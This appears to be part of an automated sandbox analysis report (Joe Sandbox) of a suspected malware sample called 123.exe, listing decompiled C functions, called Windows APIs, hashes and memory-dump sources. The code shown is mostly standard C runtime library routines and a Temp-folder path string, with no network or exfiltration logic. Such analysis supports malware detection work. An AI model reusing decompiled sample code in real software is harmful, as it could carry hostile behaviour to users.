0x00911ed6
0x00911edb
0x00911ee5
0x00911eea
0x00911eed
0x00911ef0
0x00911ef0
0x00911ef3
0x00911ef6
0x00911ef8
0x00911f01
0x00911f05
0x00911f06
0x00911f0a
0x00911f10
0x00911f19
0x00911f26
0x00911f2d
0x00911f31
0x00911f3c
0x00911f41
0x00911f47
0x00000000
0x00911f4d
0x00911fa4
0x00911fa5
0x00912028
0x0091202f
0x00912037
0x0091203f
0x00912044
0x00912047
0x0091204c
0x00000000
0x00912052
0x00912067
0x00912147
0x0091214d
0x00000000
0x0091206d
0x00912076
0x00912078
0x0091207e
0x00000000
0x00912084
0x00912088
0x009120be
0x009120c1
0x00000000
0x009120c7
0x009120c7
0x00000000
0x009120c7
0x0091208a
0x0091208c
0x0091208e
0x009120a7
0x00000000
0x009120ad
0x009120b1
0x00000000
0x009120b7
0x009120b7
0x009120ba
0x009120bb
0x00000000
0x009120bb
0x009120b1
0x009120a7
0x00912088
0x0091207e
0x00912067
0x0091204c
0x00911f47
0x00911eb9
0x00000000
0x00911fa9
0x00911fa9
0x00911fad
0x00911fb0
0x00911fd2
0x00911fd5
0x00911fda
0x00911fde
0x00911fe2
0x00912010
0x00912012
0x00000000
0x00911fe4
0x00911fe4
0x00911fe7
0x00911fea
0x00911fed
0x00912124
0x00912127
0x0091212a
0x00912134
0x0091213f
0x00912144
0x00000000
0x00911ff3
0x00911ffa
0x00911fff
0x00912002
0x00912005
0x00000000
0x0091200b
0x0091200b
0x00000000
0x0091200b
0x00912005
0x00911fed
0x00911fb2
0x00911fb6
0x00911fb9
0x00911fbe
0x00911fc4
0x00911fc6
0x00911fcd
0x00912013
0x00912016
0x00912017
0x0091201c
0x0091201f
0x00912022
0x00000000
0x00000000
0x00000000
0x00000000
0x00912022
0x00000000
0x00911fb0
0x00911e4b
0x00912153
0x00912153
0x00912155
0x00912158
0x00912158
0x00912158
0x00912158
0x0091216a
0x0091216c
0x0091216d
0x0091216e
0x00912178

APIs

GetConsoleOutputCP.KERNEL32(00000000,00000000,?), ref: 00911E15
__fassign.LIBCMT ref: 00911FFA
__fassign.LIBCMT ref: 00912017
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0091205F
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0091209F
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00912147

Memory Dump Source

Source File: 00000001.00000002.290992540.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000001.00000002.290979740.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291303758.000000000091D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291738151.000000000092C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291908957.0000000000958000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291968781.0000000000959000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291981514.000000000095A000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_900000_123.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ConsoleErrorLastOutput
String ID:
API String ID: 1735259414-0
Opcode ID: c8884a64cbd89107c972f22de10186af36ec60ce03e52f26d4884b8a27d5c6e8
Instruction ID: a2a7364dc2a2c6d1a0ea9f3b01fb56b651aca8a2b4218b365845f1a93bd440ad
Opcode Fuzzy Hash: c8884a64cbd89107c972f22de10186af36ec60ce03e52f26d4884b8a27d5c6e8
Instruction Fuzzy Hash: 84C1AC71E0425C9FCB15CFE8C880AEDBBB9AF49314F28416AE955F7341D7319A86CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0090848A Relevance: 9.1, APIs: 6, Instructions: 60
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 82%

			E0090848A(void* __ecx) {
				void* _t8;
				void* _t11;
				void* _t13;
				void* _t14;
				void* _t18;
				void* _t23;
				long _t24;
				void* _t27;

				_t13 = __ecx;
				if( *0x92c040 != 0xffffffff) {
					_t24 = GetLastError();
					_t11 = E00909693(_t13,  *0x92c040);
					_t14 = _t23;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						if(_t11 == 0) {
							if(E009096CE(_t14,  *0x92c040, 0xffffffff) != 0) {
								_push(0x28);
								_t27 = E0090BA7A();
								_t18 = 1;
								if(_t27 == 0) {
									L8:
									_t11 = 0;
									E009096CE(_t18,  *0x92c040, 0);
								} else {
									_t8 = E009096CE(_t18,  *0x92c040, _t27);
									_pop(_t18);
									if(_t8 != 0) {
										_t11 = _t27;
										_t27 = 0;
									} else {
										goto L8;
									}
								}
								E009098BB(_t27);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t24);
					return _t11;
				} else {
					return 0;
				}
			}

0x0090848a
0x00908491
0x009084a4
0x009084ab
0x009084ad
0x009084b1
0x009084ca
0x009084ca
0x009084b3
0x009084b5
0x009084c8
0x009084cf
0x009084d8
0x009084db
0x009084de
0x009084f2
0x009084f2
0x009084fb
0x009084e0
0x009084e7
0x009084ed
0x009084f0
0x00908504
0x00908506
0x00000000
0x00000000
0x00000000
0x009084f0
0x00908509
0x00000000
0x00000000
0x00000000
0x009084c8
0x009084b5
0x00908511
0x0090851b
0x00908493
0x00908495
0x00908495

APIs

GetLastError.KERNEL32(?,?,00908481,00906BBC,0090594F), ref: 00908498
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 009084A6
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 009084BF
SetLastError.KERNEL32(00000000,00908481,00906BBC,0090594F), ref: 00908511

Memory Dump Source

Source File: 00000001.00000002.290992540.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000001.00000002.290979740.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291303758.000000000091D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291738151.000000000092C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291908957.0000000000958000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291968781.0000000000959000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291981514.000000000095A000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_900000_123.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: fefab50dd49c4613f3bcd41186994788013001dd207703148365c602a0390156
Instruction ID: ec62cb99780617eda0a1cce8fc204c2890f3bbdd379570cb0ac94c41df1fce0d
Opcode Fuzzy Hash: fefab50dd49c4613f3bcd41186994788013001dd207703148365c602a0390156
Instruction Fuzzy Hash: 4F01D87232D612AEEB3517787C45B7B3A9CEB417747200229F550561F2EF574C066184

Uniqueness

Uniqueness Score: -1.00%

Function 009038AB Relevance: 9.0, APIs: 6, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E009038AB(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t36;
				void* _t41;
				intOrPtr* _t64;
				intOrPtr* _t75;
				intOrPtr* _t76;
				void* _t78;

				_t71 = __edx;
				_t58 = __ebx;
				_push(8);
				E0090557D(0x91cc5d, __ebx, __edi, __esi);
				E00903255(_t78 - 0x14, 0);
				_t75 =  *0x9593d0; // 0x0
				 *(_t78 - 4) =  *(_t78 - 4) & 0x00000000;
				 *((intOrPtr*)(_t78 - 0x10)) = _t75;
				_t36 = E00901735( *((intOrPtr*)(_t78 + 8)), E009016A4(__ebx, 0x9592ec, __edx, __edi));
				_t73 = _t36;
				if(_t36 != 0) {
					L5:
					E009032AD(_t78 - 0x14);
					return E0090554B(_t73);
				} else {
					if(_t75 == 0) {
						_push( *((intOrPtr*)(_t78 + 8)));
						_push(_t78 - 0x10);
						_t41 = E00903DDA(__ebx, _t73, _t75, __eflags);
						_pop(_t64);
						__eflags = _t41 - 0xffffffff;
						if(__eflags == 0) {
							E0090157A();
							asm("int3");
							_push(8);
							E0090557D(0x91cc9b, __ebx, _t73, _t75);
							_t76 = _t64;
							 *((intOrPtr*)(_t78 - 0x14)) = _t76;
							 *((intOrPtr*)(_t78 - 0x10)) = 0;
							__eflags =  *((intOrPtr*)(_t78 + 0x10));
							if( *((intOrPtr*)(_t78 + 0x10)) != 0) {
								 *_t76 = 0x91d38c;
								 *((intOrPtr*)(_t76 + 0x10)) = 0;
								 *((intOrPtr*)(_t76 + 0x30)) = 0;
								 *((intOrPtr*)(_t76 + 0x34)) = 0;
								 *((intOrPtr*)(_t76 + 0x38)) = 0;
								 *((intOrPtr*)(_t76 + 8)) = 0x91d380;
								 *(_t78 - 4) = 0;
								 *((intOrPtr*)(_t78 - 0x10)) = 1;
							}
							 *((intOrPtr*)(_t76 +  *((intOrPtr*)( *_t76 + 4)))) = 0x91d388;
							_t28 =  *((intOrPtr*)( *_t76 + 4)) - 8; // -8
							 *((intOrPtr*)( *((intOrPtr*)( *_t76 + 4)) + _t76 - 4)) = _t28;
							__eflags =  *((intOrPtr*)( *_t76 + 4)) + _t76;
							E00904297(_t58,  *((intOrPtr*)( *_t76 + 4)) + _t76, _t71, _t73,  *((intOrPtr*)( *_t76 + 4)) + _t76,  *((intOrPtr*)(_t78 + 8)),  *((intOrPtr*)(_t78 + 0xc))); // executed
							return E0090554B(_t76);
						} else {
							_t73 =  *((intOrPtr*)(_t78 - 0x10));
							 *((intOrPtr*)(_t78 - 0x10)) = _t73;
							 *(_t78 - 4) = 1;
							E00903559(__eflags, _t73);
							 *0x91d130();
							 *((intOrPtr*)( *((intOrPtr*)( *_t73 + 4))))();
							 *0x9593d0 = _t73;
							goto L5;
						}
					} else {
						_t73 = _t75;
						goto L5;
					}
				}
			}

0x009038ab
0x009038ab
0x009038ab
0x009038b2
0x009038bc
0x009038c1
0x009038cc
0x009038d0
0x009038dc
0x009038e1
0x009038e5
0x0090392a
0x0090392d
0x00903939
0x009038e7
0x009038e9
0x009038ef
0x009038f5
0x009038f6
0x009038fc
0x009038fd
0x00903900
0x0090393a
0x0090393f
0x00903940
0x00903947
0x0090394c
0x0090394e
0x00903953
0x00903956
0x00903959
0x0090395b
0x00903961
0x00903964
0x00903967
0x0090396a
0x0090396d
0x00903974
0x00903977
0x00903977
0x00903989
0x00903995
0x00903998
0x009039a1
0x009039a3
0x009039af
0x00903902
0x00903902
0x00903905
0x00903909
0x0090390d
0x0090391a
0x00903922
0x00903924
0x00000000
0x00903924
0x009038eb
0x009038eb
0x00000000
0x009038eb
0x009038e9

APIs

__EH_prolog3.LIBCMT ref: 009038B2
std::_Lockit::_Lockit.LIBCPMT ref: 009038BC

Part of subcall function 009016A4: std::_Lockit::_Lockit.LIBCPMT ref: 009016C0
Part of subcall function 009016A4: std::_Lockit::~_Lockit.LIBCPMT ref: 009016DC

codecvt.LIBCPMT ref: 009038F6
std::_Facet_Register.LIBCPMT ref: 0090390D
std::_Lockit::~_Lockit.LIBCPMT ref: 0090392D
Concurrency::cancel_current_task.LIBCPMT ref: 0090393A

Memory Dump Source

Source File: 00000001.00000002.290992540.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000001.00000002.290979740.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291303758.000000000091D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291738151.000000000092C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291908957.0000000000958000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291968781.0000000000959000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291981514.000000000095A000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_900000_123.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
String ID:
API String ID: 2133458128-0
Opcode ID: be2b6b8c1e46f694e3d362d7bfcb8ff475807516a9ee6693b3dbb3495f9c0da0
Instruction ID: cedd5bb37404f175a666d88287bbbbab4815bba5dae8ab24e22bcb092b8fea6e
Opcode Fuzzy Hash: be2b6b8c1e46f694e3d362d7bfcb8ff475807516a9ee6693b3dbb3495f9c0da0
Instruction Fuzzy Hash: 0201AD31A10215DFCB05EBA49811BAD77B9BFC4310F648008F425AB2D1DF749F01DB80

Uniqueness

Uniqueness Score: -1.00%

Function 009163AA Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E009163AA(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				intOrPtr _t14;
				intOrPtr _t15;
				intOrPtr _t17;
				intOrPtr _t36;
				intOrPtr* _t38;
				intOrPtr _t39;

				_t38 = _a4;
				if(_t38 != 0) {
					__eflags =  *_t38;
					if( *_t38 != 0) {
						_t14 = E009158D1(_a16, 0, _t38, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t14;
						if(__eflags != 0) {
							_t36 = _a8;
							__eflags = _t14 -  *((intOrPtr*)(_t36 + 0xc));
							if(_t14 <=  *((intOrPtr*)(_t36 + 0xc))) {
								L10:
								_t15 = E009158D1(_a16, 0, _t38, 0xffffffff,  *((intOrPtr*)(_t36 + 8)),  *((intOrPtr*)(_t36 + 0xc)), 0, 0);
								__eflags = _t15;
								if(__eflags != 0) {
									 *((intOrPtr*)(_t36 + 0x10)) = _t15 - 1;
									_t17 = 0;
									__eflags = 0;
								} else {
									E00909B26(GetLastError());
									_t17 =  *((intOrPtr*)(E00909B5C(__eflags)));
								}
								L13:
								L14:
								return _t17;
							}
							_t17 = E0090C152(_t36, _t14);
							__eflags = _t17;
							if(_t17 != 0) {
								goto L13;
							}
							goto L10;
						}
						E00909B26(GetLastError());
						_t17 =  *((intOrPtr*)(E00909B5C(__eflags)));
						goto L14;
					}
					_t39 = _a8;
					__eflags =  *((intOrPtr*)(_t39 + 0xc));
					if( *((intOrPtr*)(_t39 + 0xc)) != 0) {
						L5:
						 *((char*)( *((intOrPtr*)(_t39 + 8)))) = 0;
						_t17 = 0;
						 *((intOrPtr*)(_t39 + 0x10)) = 0;
						goto L14;
					}
					_t17 = E0090C152(_t39, 1);
					__eflags = _t17;
					if(_t17 != 0) {
						goto L14;
					}
					goto L5;
				}
				E0090C1D7(_a8);
				return 0;
			}

0x009163b0
0x009163b5
0x009163c9
0x009163cc
0x009163fe
0x00916406
0x00916408
0x00916421
0x00916424
0x00916427
0x00916435
0x00916444
0x0091644c
0x0091644e
0x00916467
0x0091646a
0x0091646a
0x00916450
0x00916457
0x00916462
0x00916462
0x0091646c
0x0091646d
0x00000000
0x0091646d
0x0091642c
0x00916431
0x00916433
0x00000000
0x00000000
0x00000000
0x00916433
0x00916411
0x0091641c
0x00000000
0x0091641c
0x009163ce
0x009163d1
0x009163d4
0x009163e7
0x009163ea
0x009163ec
0x009163ee
0x00000000
0x009163ee
0x009163da
0x009163df
0x009163e1
0x00000000
0x00000000
0x00000000
0x009163e1
0x009163ba
0x00000000

Strings

C:\Windows\Temp\123.exe, xrefs: 009163AF

Memory Dump Source

Source File: 00000001.00000002.290992540.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000001.00000002.290979740.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291303758.000000000091D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291738151.000000000092C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291908957.0000000000958000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291968781.0000000000959000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291981514.000000000095A000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_900000_123.jbxd

Yara matches

Similarity

API ID:
String ID: C:\Windows\Temp\123.exe
API String ID: 0-3534342833
Opcode ID: 71dc9d31016ff082e8040ac0b30ed570c90a74c2ffaac194c80510e1ac474849
Instruction ID: ae61c3889c3cab095deef9752a7062753cbc34042c32e8aea9ee4ac5ea0f160f
Opcode Fuzzy Hash: 71dc9d31016ff082e8040ac0b30ed570c90a74c2ffaac194c80510e1ac474849
Instruction Fuzzy Hash: FD21C671B0420DAFDB20AF659C81EAB7BADEF803747508615F465D71E1E730EC8087A0

Uniqueness

Uniqueness Score: -1.00%

Function 0090CC34 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 25%

			E0090CC34(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t14;

				_v8 = _v8 & 0x00000000;
				_t8 =  &_v8;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t8, __ecx);
				if(_t8 != 0) {
					_t8 = GetProcAddress(_v8, "CorExitProcess");
					_t14 = _t8;
					if(_t14 != 0) {
						 *0x91d130(_a4);
						_t8 =  *_t14();
					}
				}
				if(_v8 != 0) {
					return FreeLibrary(_v8);
				}
				return _t8;
			}

0x0090cc3a
0x0090cc3e
0x0090cc49
0x0090cc51
0x0090cc5c
0x0090cc62
0x0090cc66
0x0090cc6d
0x0090cc73
0x0090cc73
0x0090cc75
0x0090cc7a
0x00000000
0x0090cc7f
0x0090cc86

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,0090CBE6,?,?,0090CBAE,00000000,00000000,?), ref: 0090CC49
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0090CC5C
FreeLibrary.KERNEL32(00000000,?,?,0090CBE6,?,?,0090CBAE,00000000,00000000,?), ref: 0090CC7F

Strings

CorExitProcess, xrefs: 0090CC54
mscoree.dll, xrefs: 0090CC42

Memory Dump Source

Source File: 00000001.00000002.290992540.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000001.00000002.290979740.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291303758.000000000091D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291738151.000000000092C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291908957.0000000000958000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291968781.0000000000959000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291981514.000000000095A000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_900000_123.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: af5d85ba6a0990638a284fefbdd853619497bf88a06afc2b8a9acfba3463a078
Instruction ID: 0f05772e2a4581abec84ed09527d4fcd225ced0ec299cb3101bdc4a3230e4091
Opcode Fuzzy Hash: af5d85ba6a0990638a284fefbdd853619497bf88a06afc2b8a9acfba3463a078
Instruction Fuzzy Hash: 99F05871B16228FBEB119F60DD0DBDEBA69EF44755F004160B809A20A0DB708F45EA90

Uniqueness

Uniqueness Score: -1.00%

Function 0091C091 Relevance: 7.7, APIs: 5, Instructions: 244
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 88%

			E0091C091(signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr* _a24, intOrPtr _a28, int _a32) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				intOrPtr* _v32;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				intOrPtr _v48;
				void* _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t55;
				intOrPtr* _t60;
				int _t62;
				signed int _t65;
				signed int _t66;
				intOrPtr* _t67;
				void* _t69;
				signed int _t70;
				signed int _t71;
				intOrPtr* _t77;
				char* _t79;
				char* _t80;
				intOrPtr _t95;
				intOrPtr _t96;
				intOrPtr* _t102;
				signed int _t104;
				void* _t105;
				intOrPtr* _t107;
				void* _t108;
				intOrPtr* _t109;

				_t55 =  *0x92c014; // 0xb29a853a
				_v8 = _t55 ^ _t104;
				_t103 = _a20;
				_v44 = _a4;
				_v48 = _a8;
				_t59 = _a24;
				_v40 = _a24;
				_t102 = _a16;
				_v36 = _t102;
				if(_t103 <= 0) {
					if(_t103 < 0xffffffff) {
						goto L60;
					} else {
						goto L3;
					}
				} else {
					_t103 = E0090C04D(_t102, _t103);
					_t59 = _v40;
					L3:
					_t85 = _a28;
					if(_t85 <= 0) {
						if(_t85 < 0xffffffff) {
							goto L60;
						} else {
							goto L6;
						}
					} else {
						_t85 = E0090C04D(_t59, _t85);
						L6:
						_t62 = _a32;
						if(_t62 == 0) {
							_t62 =  *( *_v44 + 8);
							_a32 = _t62;
						}
						if(_t103 == 0 || _t85 == 0) {
							if(_t103 == _t85) {
								L59:
								_push(2);
								goto L22;
							} else {
								if(_t85 > 1) {
									L31:
									_t60 = 1;
								} else {
									if(_t103 > 1) {
										L21:
										_push(3);
										goto L22;
									} else {
										if(GetCPInfo(_t62,  &_v28) == 0) {
											goto L60;
										} else {
											if(_t103 <= 0) {
												if(_t85 <= 0) {
													goto L32;
												} else {
													if(_v28 >= 2) {
														_t79 =  &_v22;
														if(_v22 != 0) {
															_t103 = _v40;
															while(1) {
																_t95 =  *((intOrPtr*)(_t79 + 1));
																if(_t95 == 0) {
																	goto L31;
																}
																_t101 =  *_t103;
																if(_t101 <  *_t79 || _t101 > _t95) {
																	_t79 = _t79 + 2;
																	if( *_t79 != 0) {
																		continue;
																	} else {
																		goto L31;
																	}
																} else {
																	goto L59;
																}
																goto L61;
															}
														}
													}
													goto L31;
												}
											} else {
												if(_v28 >= 2) {
													_t80 =  &_v22;
													if(_v22 != 0) {
														while(1) {
															_t96 =  *((intOrPtr*)(_t80 + 1));
															if(_t96 == 0) {
																goto L21;
															}
															_t101 =  *_t102;
															if(_t101 <  *_t80 || _t101 > _t96) {
																_t80 = _t80 + 2;
																if( *_t80 != 0) {
																	continue;
																} else {
																	goto L21;
																}
															} else {
																goto L59;
															}
															goto L22;
														}
													}
												}
												goto L21;
												L22:
												_pop(_t60);
											}
										}
									}
								}
							}
						} else {
							L32:
							_t102 = 0;
							_t65 = E00915855(_a32, 9, _v36, _t103, 0, 0);
							_t107 = _t105 + 0x18;
							_v44 = _t65;
							if(_t65 == 0) {
								L60:
								_t60 = 0;
							} else {
								_t101 = _t65 + _t65 + 8;
								asm("sbb eax, eax");
								_t66 = _t65 & _t65 + _t65 + 0x00000008;
								if(_t66 == 0) {
									_t67 = 0;
									_v32 = 0;
									goto L41;
								} else {
									if(_t66 > 0x400) {
										_t77 = E0091062B(_t66);
										_v32 = _t77;
										if(_t77 == 0) {
											goto L57;
										} else {
											 *_t77 = 0xdddd;
											goto L39;
										}
									} else {
										E00905660(_t66);
										_t77 = _t107;
										_v32 = _t77;
										if(_t77 == 0) {
											L57:
											_t85 = _v32;
										} else {
											 *_t77 = 0xcccc;
											L39:
											_t67 = _t77 + 8;
											_v32 = _t67;
											L41:
											if(_t67 == 0) {
												goto L57;
											} else {
												_t103 = _a32;
												_t69 = E00915855(_a32, 1, _v36, _a32, _t67, _v44);
												_t108 = _t107 + 0x18;
												if(_t69 == 0) {
													goto L57;
												} else {
													_t70 = E00915855(_t103, 9, _v40, _t85, _t102, _t102);
													_t109 = _t108 + 0x18;
													_v36 = _t70;
													if(_t70 == 0) {
														goto L57;
													} else {
														_t101 = _t70 + _t70 + 8;
														asm("sbb eax, eax");
														_t71 = _t70 & _t70 + _t70 + 0x00000008;
														if(_t71 == 0) {
															_t103 = _t102;
															goto L52;
														} else {
															if(_t71 > 0x400) {
																_t103 = E0091062B(_t71);
																if(_t103 == 0) {
																	goto L55;
																} else {
																	 *_t103 = 0xdddd;
																	goto L50;
																}
															} else {
																E00905660(_t71);
																_t103 = _t109;
																if(_t103 == 0) {
																	L55:
																	_t85 = _v32;
																} else {
																	 *_t103 = 0xcccc;
																	L50:
																	_t103 = _t103 + 8;
																	L52:
																	if(_t103 == 0 || E00915855(_a32, 1, _v40, _t85, _t103, _v36) == 0) {
																		goto L55;
																	} else {
																		_t85 = _v32;
																		_t102 = E009101CD(_v48, _a12, _v32, _v44, _t103, _v36, _t102, _t102, _t102);
																	}
																}
															}
														}
														E0090501C(_t103);
													}
												}
											}
										}
									}
								}
								E0090501C(_t85);
								_t60 = _t102;
							}
						}
					}
				}
				L61:
				return E0090528B(_t60, _t85, _v8 ^ _t104, _t101, _t102, _t103);
			}

0x0091c099
0x0091c0a0
0x0091c0a8
0x0091c0ab
0x0091c0b1
0x0091c0b4
0x0091c0b7
0x0091c0bb
0x0091c0be
0x0091c0c3
0x0091c0d8
0x00000000
0x00000000
0x00000000
0x00000000
0x0091c0c5
0x0091c0cd
0x0091c0cf
0x0091c0de
0x0091c0de
0x0091c0e3
0x0091c0f5
0x00000000
0x00000000
0x00000000
0x00000000
0x0091c0e5
0x0091c0ee
0x0091c0fb
0x0091c0fb
0x0091c100
0x0091c107
0x0091c10a
0x0091c10a
0x0091c10f
0x0091c11b
0x0091c301
0x0091c301
0x00000000
0x0091c121
0x0091c124
0x0091c1ad
0x0091c1af
0x0091c12a
0x0091c12d
0x0091c172
0x0091c172
0x00000000
0x0091c12f
0x0091c13c
0x00000000
0x0091c142
0x0091c144
0x0091c17c
0x00000000
0x0091c17e
0x0091c182
0x0091c188
0x0091c18b
0x0091c18d
0x0091c190
0x0091c190
0x0091c195
0x00000000
0x00000000
0x0091c197
0x0091c19b
0x0091c1a5
0x0091c1ab
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0091c19b
0x0091c190
0x0091c18b
0x00000000
0x0091c182
0x0091c146
0x0091c14a
0x0091c150
0x0091c153
0x0091c155
0x0091c155
0x0091c15a
0x00000000
0x00000000
0x0091c15c
0x0091c160
0x0091c16a
0x0091c170
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0091c160
0x0091c155
0x0091c153
0x00000000
0x0091c174
0x0091c174
0x0091c174
0x0091c144
0x0091c13c
0x0091c12d
0x0091c124
0x0091c1b5
0x0091c1b5
0x0091c1b5
0x0091c1c2
0x0091c1c7
0x0091c1ca
0x0091c1cf
0x0091c308
0x0091c308
0x0091c1d5
0x0091c1d8
0x0091c1dd
0x0091c1df
0x0091c1e1
0x0091c224
0x0091c226
0x00000000
0x0091c1e3
0x0091c1e8
0x0091c205
0x0091c20a
0x0091c210
0x00000000
0x0091c216
0x0091c216
0x00000000
0x0091c216
0x0091c1ea
0x0091c1ea
0x0091c1ef
0x0091c1f1
0x0091c1f6
0x0091c2f3
0x0091c2f3
0x0091c1fc
0x0091c1fc
0x0091c21c
0x0091c21c
0x0091c21f
0x0091c229
0x0091c22b
0x00000000
0x0091c231
0x0091c239
0x0091c23f
0x0091c244
0x0091c249
0x00000000
0x0091c24f
0x0091c258
0x0091c25d
0x0091c260
0x0091c265
0x00000000
0x0091c26b
0x0091c26e
0x0091c273
0x0091c275
0x0091c277
0x0091c2ab
0x00000000
0x0091c279
0x0091c27e
0x0091c299
0x0091c29e
0x00000000
0x0091c2a0
0x0091c2a0
0x00000000
0x0091c2a0
0x0091c280
0x0091c280
0x0091c285
0x0091c289
0x0091c2e7
0x0091c2e7
0x0091c28b
0x0091c28b
0x0091c2a6
0x0091c2a6
0x0091c2ad
0x0091c2af
0x00000000
0x0091c2ca
0x0091c2ca
0x0091c2e3
0x0091c2e3
0x0091c2af
0x0091c289
0x0091c27e
0x0091c2eb
0x0091c2f0
0x0091c265
0x0091c249
0x0091c22b
0x0091c1f6
0x0091c1e8
0x0091c2f7
0x0091c2fd
0x0091c2fd
0x0091c1cf
0x0091c10f
0x0091c0e3
0x0091c30a
0x0091c31b

APIs

GetCPInfo.KERNEL32(010CF640,010CF640,?,7FFFFFFF,?,?,0091C34D,010CF640,010CF640,?,010CF640,?,?,?,?,010CF640), ref: 0091C134
__alloca_probe_16.LIBCMT ref: 0091C1EA
__alloca_probe_16.LIBCMT ref: 0091C280
__freea.LIBCMT ref: 0091C2EB
__freea.LIBCMT ref: 0091C2F7

Memory Dump Source

Source File: 00000001.00000002.290992540.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000001.00000002.290979740.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291303758.000000000091D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291738151.000000000092C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291908957.0000000000958000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291968781.0000000000959000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291981514.000000000095A000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_900000_123.jbxd

Yara matches

Similarity

API ID: __alloca_probe_16__freea$Info
String ID:
API String ID: 2330168043-0
